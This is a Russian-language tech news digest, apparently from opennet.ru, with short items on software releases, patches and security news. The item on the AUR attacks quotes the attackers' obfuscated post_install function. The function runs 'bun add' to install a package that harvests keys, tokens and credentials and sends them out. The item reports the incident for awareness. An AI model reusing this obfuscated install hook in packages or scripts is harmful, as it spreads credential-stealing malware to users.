Компания Oracle опубликовала плановый выпуск обновлений своих продуктов (Critical Patch Update), нацеленный на устранение критических проблем и уязвимостей. В июньском обновлении устранена 245 уязвимостей. Некоторые проблемы: 1 уязвимость в сервере MySQL, которая может быть эксплуатирована удалённо без прохождения аутентификации. Проблема связана с обработкой соединений и имеет уровень опасности 7.5 из 10. Уязвимость устранена в выпусках MySQL Community Server 9.7.1 и 8.4.10. 10 уязвимостей в VirtualBox, три из которых помечены как опасные (7.5 из 10). Детали о характере уязвимостей не раскрываются, упоминается лишь, что они вызваны проблемами в реализации VVM, общих каталогов и устройства VMSVGA. Проблемы устранены в выпуске VirtualBox 7.2.10. … Читать далее Уязвимости в MySQL, VirtualBox, Solaris и других продуктах Oracle

Разработчики проекта GrapheneOS, развивающего защищённую свободную прошивку на базе Android, объявили о готовности порта на базе выпущенной вчера платформы Android 17. В настоящее время осуществляется перенос порта в публичный репозиторий с исходным кодом (разработчики GrapheneOS получили доступ к коду и патчам Android до передачи в открытый доступ, благодаря партнёрству с одним из OEM-поставщиков). Сегодня планируют выпустить финальный релиз GrapheneOS на базе Android 16 QPR2, после чего завтра предложить начальную версию на базе Android 17. В версии GrapheneOS на базе Android 17 обеспечена поддержка всех устройств, для которых формировались сборки на базе ветки Android 16, но протестированы сборки пока только на … Читать далее GrapheneOS портирован на Android 17

Компания Oracle опубликовала корректирующий релиз системы виртуализации VirtualBox 7.2.10, в котором представлено 14 изменений: В дополнения для гостевых систем и хост-окружений с Linux добавлена начальная поддержка ядра Linux 7.1, включены дополнительные исправления для дистрибутива RHEL 9.8, устранён сбой при при сборке модулей ядра в openSUSE 16.0. Добавлена поддержка сборки исходного кода с использованием ассемблера NASM вместо YASM. В дополнениях для хост-окружений с Linux решена проблема, мешавшая запуску виртуальных машин из-за сбоев в ядре. В дополнения для гостевых систем с Linux добавлена начальная поддержка протокола Extended Data Control для доступа к буферу обмена в гостевых системах с KDE Plasma, использующих Waland. … Читать далее Выпуск VirtualBox 7.2.10

Компания Google опубликовала релиз открытой мобильной платформы Android 17. Связанные с новым выпуском исходные тексты размещены в Git-репозитории проекта (ветка android-17.0.0_r1). Сборки прошивки подготовлены для устройств Pixel 6/6a/6 Pro, Pixel 7/7a/7 Pro, Pixel 8/8a/8 Pro, Pixel 9/9a/9 Pro/9 Pro XL/9 Pro Fold, Pixel 10/10 Pro/10 Pro XL/10 Pro Fold, Pixel Fold и Pixel Tablet. Предварительные сборки прошивок доступны для устройств HONOR, iQOO, Lenovo, OnePlus, OPPO, realme, Sharp, vivo и Xiaomi. В процессе формирования универсальные сборки GSI (Generic System Images), подходящие для разных устройств на базе архитектур ARM64 и x86_64. Среди изменений (1, 2, 3): Добавлен новый режим многооконной работы — … Читать далее Выпуск мобильной платформы Android 17

Состоялся релиз web-браузера Firefox 152 и сформированы обновления прошлых веток с длительным сроком поддержки — 140.12.0 и 115.37.0. На стадию бета-тестирования в ближайшее время будет переведена ветка Firefox 153, релиз которой намечен на 21 июля. Основные новшества в Firefox 152 (1, 2, 3): Переработан интерфейс конфигуратора, в котором расширены возможности поиска настроек, крупные секции разделены на несколько отдельных страниц, улучшена навигация, обновлены метки и описание настроек. Добавлена экспериментальная поддержка формата изображений JPEG XL, который стандартизирован в 2021 году (ISO/IEC 18181) как универсальная замена JPEG, превосходящая WebP, JPEG, PNG и GIF по эффективности сжатия и поддерживающая сжатие существующих JPEG-файлов без потери … Читать далее Выпуск Firefox 152 с обновлённым конфигуратором и поддержкой JPEG XL

Опубликован выпуск мультимедийной библиотеки LDL 0.3 (Little DirectMedia Layer), позволяющей создавать графические приложения, способные работать как на современных, так и на устаревших системах (Windows 95+, macOS/OS X/Mac OS X 10.6+, дистрибутивы с ядром Linux 2.0+, FreeBSD 3.0+). Предоставляется простой кроссплатформенный API для управления окнами и обработки событий с устройств ввода. Для отрисовки может использоваться OpenGL 1.0-4.6. Код написан на языке Си и поставляется под лицензией LGPL 3.0. В новом выпуске: Добавлена поддержка TrueType-шрифтов с использованием библиотеки FreeType. Через интеграцию библиотеки stb_image обеспечена поддержка различных форматов изображений. Проект стал модульным — по умолчанию в составе движка теперь собираются три библиотеки: LDL, … Читать далее Релиз графической библиотеки LDL 0.3, оптимизированной для маломощных систем

После четырёх месяцев разработки опубликован релиз среды рабочего стола KDE Plasma 6.7. Для оценки работы новых выпусков KDE можно воспользоваться сборками от проектов KDE Linux, KDE Neon и openSUSE (Argon, основанный на openSUSE Leap, и Krypton, основанный на openSUSE Tumbleweed). Основные изменения в KDE Plasma 6.7: В состав включён пользовательский интерфейс Plasma Bigscreen, предназначенный для использования на мультимедийных устройствах, подключаемых к телевизорам и проекторам. Окружение оптимизировано для работы с большими экранами и управления без клавиатуры c использованием пультов дистанционного управления или голосового помощника. Индегрирован унифицированный движок стилей Union, позволяющий использовать разные технологии стилевого оформления приложений, доступные в KDE. По умолчанию … Читать далее Релиз среды рабочего стола KDE Plasma 6.7

Компания «Базальт СПО» и АНО «Институт логики, когнитологии и развития личности» проводят конкурс СПО проектов «Код логики«, для участия в котором приглашаются разработчики, внёсшие значимый вклад в существующие СПО проекты, опубликованные в публичном репозитории под свободной лицензией (по ГОСТ Р 54593-2011, включая лицензии, одобренные FSF и OSI). К конкурсу допускаются физические лица, являющиеся дееспособными совершеннолетними налоговыми резидентами РФ. Предусмотрено 3 призовых места с максимальным количеством победителей — до 6 человек (одно первое место, не более двух вторых и трёх третьих). Победитель получит миллион рублей, занявшие 2 место — 500 тысяч рублей, а 3 место — 300 тысяч рублей. Заявки принимаются … Читать далее Конкурс разработчиков СПО Код Логики

После шести месяцев разработки сформирован релиз FreeBSD 15.1. Установочные сборки подготовлены для архитектур amd64, aarch64, armv7, powerpc64, powerpc64le и riscv64. Дополнительно поставляются сборки для систем виртуализации (QCOW2, VHD, VMDK, raw) и облачных окружений Amazon EC2, Google Compute Engine и Vagrant. Выпуск FreeBSD 15.1 будет поддерживаться до апреля 2027 года, а обновления для ветки 15.x будут выпускаться до 31 декабря 2029 года. Основные изменения: Драйверы беспроводных устройств rtw88 (Realtek 802.11n/ac), rtw89 (Realtek 802.11ax) и iwlwifi (Intel 02.11a/b/g/n/ac/ax/be) синхронизированы с ядром Linux 7.0. В ядре реализован фреймворк для выбора планировщика задач. В конфигурации ядра на системах amd64 в дополнение к используемому по … Читать далее Релиз FreeBSD 15.1

Комитет, управляющий разработкой набора компиляторов GCC (GCC Steering Committee), утвердил включение в кодовую базу GCC бэкенда для WebAssembly. Решение касается общего одобрения поставки WebAssembly-бэкенда в составе GCC. Вопросы утверждения реализации и принятия переданного кода будет отдельно решать команда, отвечающая за рецензирование. Бэкенд позволит использовать GCC для компиляции исходного кода на языках C/C++ в промежуточный код WebAssembly. Компиляцию в WebAssembly можно использовать для интеграции с JavaScript-проектами, запуска в web-браузере, использования в Node.js или создания обособленных многоплатформенных приложений, запускаемых при помощи WASM runtime. Бэкенд выступает генератором кода, использующим промежуточный код, подготовленный штатными фронтэндами GCC, выполняющими разбор исходного кода на поддерживаемых языках программирования … Читать далее В GCC утверждено добавление бэкенда для WebAssembly

Дэниел Cтенберг (Daniel Stenberg), автор утилиты для получения и отправки данных по сети curl, объявил о приостановке приёма и обработки сообщений об уязвимостях с 1 июля по 3 августа. Исключение будет сделано только для отправителей, пользующихся платной поддержкой. В качестве причины называется необходимость передышки и отдыха после существенного повышения нагрузки по разбору отчётов о выявлении уязвимостей в последние четыре месяца. Сообщения, отправленные через форму на Hackerone и email security@curl.se в указанное время сопровождающими рассматриваться не будут. Возможность отправки pull-запросов и сообщений о проблемах через GitHub останется доступна, но разбор накопившихся сообщений об уязвимостях начнётся только после 3 августа. Источник: http://www.opennet.ru/opennews/art.shtml?num=65693 Читать далее Проект Curl на месяц прекратит приём отчётов об уязвимостях

Проект Arch Linux приостановил регистрацию новых учётных записей в репозитории AUR (Arch User Repository) из-за непрекращающейся активности по подстановке вредоносного кода в пакеты и вандализма . После первой массовой атаки разработчики Arch Linux попытались защититься от проблемы через выборочные фильтры, но атакующие обошли их через замену npm на bun и обфускацию вызова своего кода в функции post_install. Возможность регистрации будет возвращена после реализации более действенной защиты. Для захвата пакетов атакующие использовали предоставляемую в AUR возможность принимать сопровождение над пакетам, оставшихся без сопровождающих и имеющих статус «orphaned». Подобная возможность предоставлялась без ограничений и проверок любому желающему. В настоящее время в AUR … Читать далее Arch Linux отключил регистрацию новых учётных записей в AUR

Компания Google рассказала о разработке в Калифорнийском университете в Сан-Диего вычислительного кластера, построенного из двух тысяч материнских плат бывших в употреблении смартфонов Google Pixel. Использование отслуживших своё смартфонов вместо покупки нового оборудования позволит почти без затрат построить рабочий кластер для экспериментов исследователей и студентов. Подобный подход рассматривается как один из способов снижения углеродного следа за счёт возможности обойтись без производства новых серверов для вычислительной инфраструктуры. В среднем пользователи меняют смартфон каждые четыре года, при том, что смена вызвана социальными факторами и желанием получить новую модель, а не выходом из строя или устареванием вычислительных возможностей. Получается, что без дела остаются миллионы … Читать далее Вычислительный кластер из 2000 смартфонов Google Pixel

После двух месяцев разработки Линус Торвальдс представил релиз ядра Linux 7.1. Среди наиболее заметных изменений: новый драйвер ntfsplus, первая стадия прекращения поддержки CPU i486, удаление старых Ethernet-адаптеров, удаление протоколов ISDN и AX.25, включение по умолчанию механизма Intel FRED, поддержка BPF-обработчиков в io_uring, оптимизация подсистемы подкачки, поддержка субпланировщиков в sched_ext, ввод/вывод в режиме zero-copy в драйвере ublk, ioctl-операция «shutdown» в Btrfs, динамическое переключение режима производительности в драйвере amd-pstate, поддержка xattr для Unix-сокетов. В новую версию принято 17275 исправлений от 2589 разработчиков, размер патча — 57 МБ (изменения затронули 13528 файлов, добавлено 751785 строк кода, удалено 405916 строк). В прошлом выпуске было … Читать далее Релиз ядра Linux 7.1

Несмотря на меры, предпринятые разработчиками Arch Linux, деятельность по подстановке вредоносного кода в репозитории AUR (Arch User Repository) не остановлена. Несколько часов назад вредносный код подставлен ещё в 54 пакета, оставшихся без сопровождающих (история отмены вредоносных правок). В отличие от позавчерашних атак, вместо пакетного менеджера npm для установки вредоносных зависимостей на этот раз задействована платформа bun. Для обхода реализованных фильтров в функцию post_install вставляется обфусцированная строка, в которой вызывается команда «bun add» для установки пакетов с вредоносным кодом, осуществляющим сканирование и отправку на внешний сервер ключей, токенов и учётных данных. post_install() { $’x63′»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’141x6e»s'»i»»-«$’143»o»l»o»r’$’x73′ ‘n'»e»‘x'»t»»f»‘i»l»e»-»j»s’ } … Читать далее В AUR осуществлена подстановка вредоносного кода ещё в 54 пакета

Разработчики Fedora Linux прояснили ситуацию, связанную с истечением в конце июня срока действия сертификата Microsoft, применяемого для заверения цифровой подписью прослойки Shim, используемой для верифицированной загрузки дистрибутивов Linux в режиме UEFI Secure Boot. Переход на новый сертификат должен пройти незаметно для пользователей так как фактически завершение времени жизни сертификата приведёт лишь к невозможности его использования для создания новых подписей. Во время загрузки UEFI Secure Boot срок действия сертификата не проверяется и имеет значение только отзыв скомпрометированных сертификатов. Существующие системы без установки обновления shim продолжат загрузку до тех пор, пока открытый ключ сертификата не будет удалён из прошивки или не помещён … Читать далее Истекает время жизни сертификата, которым заверен загрузчик для UEFI Secure Boot в дистрибутивах Linux

Удостоверяющий центр GlobalSign, зарегистрированный в Бельгии и принадлежащий японской корпорации GMO Group, начал отзыв SSL-сертификатов, ранее выданных российским компаниям, подпадающим под действующие в Евросоюзе санкции. В письме к партнёрам компании GlobalSign, отправленном директором российского представительства, сказано, что отзыв сертификатов начался 13 июня в 04:10 (MSK) и будет проводиться поэтапно. В качестве причины указано утверждение консорциумом CA/Browser Forum, выступающим площадкой для совместного принятия решений с учётом интересов производителей браузеров и удостоверяющих центров, новых требований по проверке организаций при выдаче сертификатов. Речь ведётся о расширенных TLS-сертификатах уровня EV (Extended Validation), подтверждающих заявленные параметры идентификации и требующих не только проверки владения доменом, но … Читать далее Удостоверяющий центр GlobalSign начал отзыв EV-сертификатов у компаний, находящихся под санкциями

Опубликован очередной еженедельный отчёт о разработке KDE, в котором представлена порция изменений для ветки KDE Plasma 6.8, релиз которой запланирован на 14 октября, а также ветки KDE Plasma 6.7, находящейся на стадии бета-тестирования перед релизом, намеченным на 16 июня. Изменения в ветке KDE Plasma 6.8: Расширены возможности для определения использования тёмных тем оформления в приложениях на базе GTK 2 и применения к ним тёмных вариантов тем пиктограмм для исключения ситуаций когда в тёмном интерфейсе показываются светлые пиктограммы. В компоненты для интеграции с web-браузерами добавлена поддержка Flatpak-пакетов с Microsoft Edge. Увеличена верхняя область захвата для перетаскивания не раскрытых на весь экран … Читать далее В KDE улучшена поддержка приложений на базе GTK 2 с тёмной темой оформления

Опубликован экспериментальный выпуск открытой реализации Win32 API — Wine 11.11. С момента выпуска 11.10 было закрыто 25 отчётов об ошибках и внесено 223 изменения. Наиболее важные изменения: В драйвер winewayland, позволяющий использовать Wine в окружениях на базе протокола Wayland, добавлена поддержка Wayland-протокола alpha-modifier-v1, позволяющего приложениям менять уровень прозрачности поверхности и выносить операции по обеспечению прозрачности на сторону композитного сервера. В winewayland реализована поддержка многослойных окон (WS_EX_LAYERED), компонуемых из нескольких слоёв для реализации эффектов, таких как полупрозрачность и непрямоугольная форма окна (в wine пока реализована только полупрозрачность). В winewayland добавлены hints-флаги для задания максимального и минимального размера статичных окон, размер которых … Читать далее Новые версии Wine 11.11 и StartWine-Launcher 423

Компания Anthropic объявила об экстренном отключении доступа к AI-моделям Fable 5 и Mythos 5 для всех пользователей после получения от правительства США директивы об экспортном контроле, изданной со ссылкой на полномочия в области национальной безопасности и без предоставления детальных пояснений. Директива запрещает доступ к моделям Fable 5 и Mythos 5 любым иностранным гражданам, как на территории США, так и за её пределами, включая иностранных сотрудников компании Anthropic, в результате чего компания была вынуждена полностью отключить модели для обеспечения соблюдения требований. Выполнение требования не повлияло на доступ к остальным моделям Anthropic. Поводом для предписания, по предположению Anthropic, послужило обнаружение метода обхода … Читать далее Власти США предписали Anthropic приостановить доступ к AI-моделям Fable 5 и Mythos 5

Инструментарий etcd-operator, помогающий разворачивать и сопровождать кластеры etcd в Kubernetes, перешёл под управление проекта Cozystack. Вместе с передачей проекта опубликована новая реализация etcd-operator, написанная с нуля и использующая API etcd-operator.cozystack.io/v1alpha2 вместо прежнего etcd.aenix.io/v1alpha1. Новую реализацию написал Тимофей Ларкин, один из мейнтейнеров прежней кодовой базы. Старый вариант сохранён в ветке v1alpha1. Код написан на Go и распространяется под лицензией Apache 2.0. Cozystack является Sandbox-проектом некоммерческой организации CNCF. Главное изменение в новом etcd-operator — отказ от StatefulSet для управления узлами. Теперь оператор напрямую работает со штатным Membership API etcd (MemberAdd, MemberPromote и MemberRemove) и сам добавляет участников, повышает learner до голосующего узла … Читать далее Проект Cozystack представил переработанный etcd-operator с новым API